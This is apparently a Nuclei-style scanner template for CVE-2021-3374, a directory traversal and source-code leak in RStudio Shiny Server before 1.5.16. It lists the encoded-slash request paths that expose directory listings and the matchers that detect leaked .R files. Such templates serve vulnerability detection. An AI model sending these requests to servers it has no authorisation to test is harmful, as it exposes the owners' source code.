id: CVE-2021-3374 info: name: Rstudio Shiny Server Directory Traversal author: geeknik severity: medium description: Rstudio Shiny-Server prior to 1.5.16 is vulnerable to directory traversal and source code leakage. This can be exploited by appending an encoded slash to the URL. reference: - https://github.com/colemanjp/rstudio-shiny-server-directory-traversal-source-code-leak - https://github.com/colemanjp/shinyserver-directory-traversal-source-code-leak - https://blog.rstudio.com/2021/01/13/shiny-server-1-5-16-update/ classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N cvss-score: 5.3 cve-id: CVE-2021-3374 cwe-id: CWE-22 tags: cve,cve2021,rstudio,traversal requests: - method: GET path: - "{{BaseURL}}/%2f/" - "{{BaseURL}}/sample-apps/hello/%2f/" matchers-condition: and matchers: - type: status status: - 200 - type: word words: - "Index of /" - type: regex part: body regex: - "[A-Za-z].*\\.R"